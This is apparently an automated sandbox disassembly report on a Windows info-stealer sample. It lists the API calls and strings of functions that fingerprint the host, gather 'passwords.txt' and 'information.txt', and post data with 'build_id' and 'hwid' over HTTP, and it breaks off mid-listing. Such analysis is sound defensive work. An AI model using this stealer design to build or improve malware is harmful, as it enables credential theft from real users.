String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
API String ID: 1779273220-3274521816
Opcode ID: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
Instruction ID: 7da96a8239c4269f2075af8d64b6677d5cc6d7227197695578cb8bd043abdbf5
Opcode Fuzzy Hash: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
Instruction Fuzzy Hash: 2E624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417AE505735C2DB786B4CCB65

Function 00414604 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414609

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84

Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
Part of subcall function 00410415: RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493

Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00426600,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265F4,00000000), ref: 00414922

Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B

Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666

Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
Part of subcall function 0041077C: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855

Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
Part of subcall function 00410925: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6

Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000), ref: 0040FC09
Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24

Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2

Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB

Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03

Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7

Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D

Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D

Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3

Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC

Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057

Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389

Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE

Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E

lstrlenA.KERNEL32(00000000,00000000,?,00426748,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426738), ref: 0041537A

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Threads: , xrefs: 0041501D
[Software], xrefs: 0041527F
Processor: , xrefs: 00414F07
TimeZone: , xrefs: 00414E52
Display Resolution: , xrefs: 00414C8D
Version: , xrefs: 00414625
Computer Name: , xrefs: 00414B8F
HWID: , xrefs: 00414864
Date: , xrefs: 004146D2
Install Date: , xrefs: 00414A67
Work Dir: In memory, xrefs: 00414994
VideoCard: , xrefs: 00415127
information.txt, xrefs: 00415395
GUID: , xrefs: 004147D0
AV: , xrefs: 00414AFB
[Processes], xrefs: 004151D3
MachineID: , xrefs: 00414751
Keyboard Languages: , xrefs: 00414D21
Path: , xrefs: 004148F8
User Name: , xrefs: 00414C0E
[Hardware], xrefs: 00414ED7
RAM: , xrefs: 004150A2
T, xrefs: 004153AE
Windows: , xrefs: 004149E8
Cores: , xrefs: 00414F98
Local Time: , xrefs: 00414DC1

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 722754166-3257470747
Opcode ID: 0e24080a7af38022f2e69f9cda5cba5382d9f19289b0d237074c7117a10858be
Instruction ID: 15cc8dd7e761a7b9687d1197911a175701b94bd7e601d052700fcacce4104c59
Opcode Fuzzy Hash: 0e24080a7af38022f2e69f9cda5cba5382d9f19289b0d237074c7117a10858be
Instruction Fuzzy Hash: 53922EB190424DE9CB15E7E1C952BEEBB789F24308F5001BEE505725C2DE782B8CCAB5

Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040C280

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C378
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
lstrcat.KERNEL32(00000000), ref: 0040C487
lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4A7
lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C4C7
lstrcat.KERNEL32(00000000), ref: 0040C4D6
lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C4F6
lstrcat.KERNEL32(00000000), ref: 0040C505
lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C525
lstrcat.KERNEL32(00000000), ref: 0040C534
lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C554
lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C562
lstrlenA.KERNEL32(00000000), ref: 0040C596
memset.MSVCRT ref: 0040C5E9
DeleteFileA.KERNEL32(00000000), ref: 0040C616

Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440

Strings

passwords.txt, xrefs: 0040C5A8

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
String ID: passwords.txt
API String ID: 3298853120-347816968
Opcode ID: 880df50352757416c639263f547c378de6bab692bf6f58774e6b1fa9bdf7c22a
Instruction ID: 3d2456610e152fb8fa5d54acb3feaddce6e398d7491f6e002fa618601dbd43d1
Opcode Fuzzy Hash: 880df50352757416c639263f547c378de6bab692bf6f58774e6b1fa9bdf7c22a
Instruction Fuzzy Hash: 00C16971800159EEDB15EBE4DD1AEEEBB75BF18304F10407AF512B21E1DB782A09DB25

Function 0041390C Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00413911

Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
Sleep.KERNEL32(0000EA60), ref: 0041421B

Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D

Strings

ERROR, xrefs: 00414057
ERROR, xrefs: 00413CFD
*, xrefs: 00414352
ERROR, xrefs: 00413ACF
ERROR, xrefs: 00413C7C
ERROR, xrefs: 00413B50
ERROR, xrefs: 00413FD6
ERROR, xrefs: 004141FE
ERROR, xrefs: 00413E29
ERROR, xrefs: 00413EAA
ERROR, xrefs: 00414183

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpylstrlen$Sleep
String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1345713276-3681523784
Opcode ID: ec65c225a6930ca2dd0ce4afc27561d63617ed4813f6f72866d51df949da7f01
Instruction ID: 81b84598b74079d87ef3f85c7997e73a576bc14dc27035db183a239247f2f400
Opcode Fuzzy Hash: ec65c225a6930ca2dd0ce4afc27561d63617ed4813f6f72866d51df949da7f01
Instruction Fuzzy Hash: D5626370904248EADB10EBE5C956BDEBBB89F19308F5041BEF445B32C1DB785B4C8B66

Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00403AFA

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
InternetCloseHandle.WININET(00000000), ref: 00404107
InternetCloseHandle.WININET(?), ref: 0040411C
InternetCloseHandle.WININET(?), ref: 00404125

Strings

build_id, xrefs: 00403F9F
------, xrefs: 00403DA8
", xrefs: 00403E7A
!, xrefs: 004040E6
", xrefs: 00403FC9
hwid, xrefs: 00403E50
------, xrefs: 00403C3E
------, xrefs: 00403EF7

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1139859944-3346224549
Opcode ID: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
Instruction ID: 7cb0d70ecfea339ca3c9d0d40474d85fcafec7ec4a7ae7ad7b1869ac4000fa9b
Opcode Fuzzy Hash: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
Instruction Fuzzy Hash: 36223BB190424CEADB11EBE4C956BEEBBB8AF18308F50417EE50573582DE781B4CCB65

Function 00406737 Relevance: 33.5, APIs: 22, Instructions: 511
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040673C

Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425DD4,00000000), ref: 0040FB31

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068A8

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

